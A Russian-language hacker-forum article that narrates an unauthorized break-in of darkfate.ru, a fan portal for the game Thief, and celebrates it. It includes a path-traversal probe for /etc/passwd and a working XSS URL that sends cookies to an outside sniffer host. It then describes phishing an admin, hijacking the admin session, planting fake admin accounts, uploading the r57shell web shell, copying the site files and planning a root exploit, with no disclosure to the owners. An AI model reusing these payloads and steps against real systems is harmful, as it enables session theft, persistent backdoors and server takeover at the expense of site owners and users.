Как хекался darkfate.ru - крупнейший российский портал об игре THIEF... Введение ...несколько лет назад... ...Когда я только только подключился к инету я был заядлым геймером - играл в Готику, Сплинтер Селл, многие другие игры в тч и Thief'а. Первым делом, когда хотел посмотреть сайты о Воре (Thief), я набрал в яндексе критерий конечно же "Thief". В первых строчках стоял darkfate.ru - лучший портал по играм серии. На тот момент я не был обременен вопросами ИТ, так что просто тусил на форуме... ...наше время... ...На сей момент мне стало интересно потестировать игровые сайты - хорошо посещаемые порталы. В закладках ИЕ (А на момент моей молодости я юзал ИЕ но вовремя бэкапил данные) я обнаружил линк на darkfate.ru. Зашел. Осмотрелся. Сайт был выполнен в перле - нужные разделы инклудились к паге. Все значения хорошо фильтровались - запросы типа "../../../../../../../../../etc/passwd%00" ничего не давали. Дам заметочки для тех кто в танке - в запросе "../../../../../../../../../etc/passwd%00" я обхожу путем подставления ../ папки, пытаясь вывести конечный файл /etc/passwd, содержащий список юзеров на сервере. Символ NULL байт обозначен хекс значением %00, он предназначен для отсечения строки. Вообще данный символ является багом пхп и перла - просто эти два интерпретатора написаны на си, а в си есть NULL байт, так что это можно считать недокументированной возможностью интерпретатора. Итак, при данном запросе меня посылали нафиг - параметры фильтруются. Я начал искать дополнительные скрипты на севере, не думая о технологии reverse ip, потому что целью было тестирование на безопасность именно портала. Зайдя на форум, я первым делом посмотрел на версию форума. Я ожидал увидеть что то типа phpbb, потому что стиль форума очень похож. Но нет, там стоял некий FRIBoard. Судя по всему он был написан на основе кода phpbb. Стал смотреть параметры - все опять таки фильтровалось. Зарегистрировался. И тут оппа! В скрипте _Нttp://darkfate.ru/forum/memberlist.cgi есть xss! Вот уязвимая строка: Код: http://darkfate.ru/forum/memberlist.cgi?sort=alpha&simb=ЗДЕСЬ_КОД Недолго думая я составил запрос Код: http://darkfate.ru/forum/memberlist.cgi?sort=alpha&simb=%3Cscript%3Elocation.href%20=%20%22http://ccl.whiteacid.org/log.php?159450%22%2Bdocument.cookie%3C/script%3E Хочу сделать отступление. Ты наверное заметил, что в символ "+" я заменил на хекс значение %2B. Это распространенная ошибка-люди пытаются эксплуатировать багу путем подставления к document.cookie знака +, а в http он считается символом эквивалентным пробелу, т.е. значение принимает вид "код document.cookie", а не "код+document.cookie". Заметь это, потому что куки не придут. Еще я использовал сервис ccl.whiteacid.org, который представляет сниффер. Посмотрел список админов - один из них пришел на форум: V Raptor. Я подсунул ему в ПМ такое письмо: Через 15 минут получил ответ: А на своем логе снифа я получил куки вида: и еще техническую инфу в виде ип +). Подставил куки значения через оперу и вошел в админку. Там посмотрел настройки форума - их много было. В тч увидел опцию "заливка файлов - откл.". Конечно я ее включил ). Задал в этой опции "Только для админов и модеров", чтобы злой юзер не поимел сервер). Создал пару фейковых админов - на всякий случай. Пока V Raptor был оффлайн (5 минут) я залил r57shell в папку _Нttp://darkfate.ru/images/forum/upload Дальше я отменил опции заливки файлов, чтобы меня не заподозрили, и быстро вышел из админки. через 2 минуты пришел админ +). И как ни в чем не бывало принялся админить... А я радостный с шеллом забекапил папку www на винт и сейчас буду смотреть рута на сервере - версия фряхи стоит 5.2, под которую наверняка есть сплоит))). Вердикт В чем же смысл взлома? А вот в чем - многие говорят что xss это детская уязвимость. Но в моем случае я могу получить рута на сервере всего лишь из за одной xss! Так что никогда не отказывайся от ее возможности... Скоро выложу скрины дефов. Отдельное спасибо товарищу Коллеру за моральную поддержку во взломе, потому что руки у меня тряслись как у онаниста - "а вдруг админ придет"? =) Удачи во взломах! ЗЫ Наученный опытом skater.ru я не стал говорить админу об уязвимостях - админы такие злые существа что простым юзерам типа меня ничего от помощи админу не обламывается =(... ЗЗЫ Автор данной статьи хотел лишь продемонстрировать несовершенность нынешних систем, а не побуждать людей к подобным действиям, посему автор, то бишь я, никакой ответственности не несу ) (с) Коллер (c) Helkern http://Xaker.Name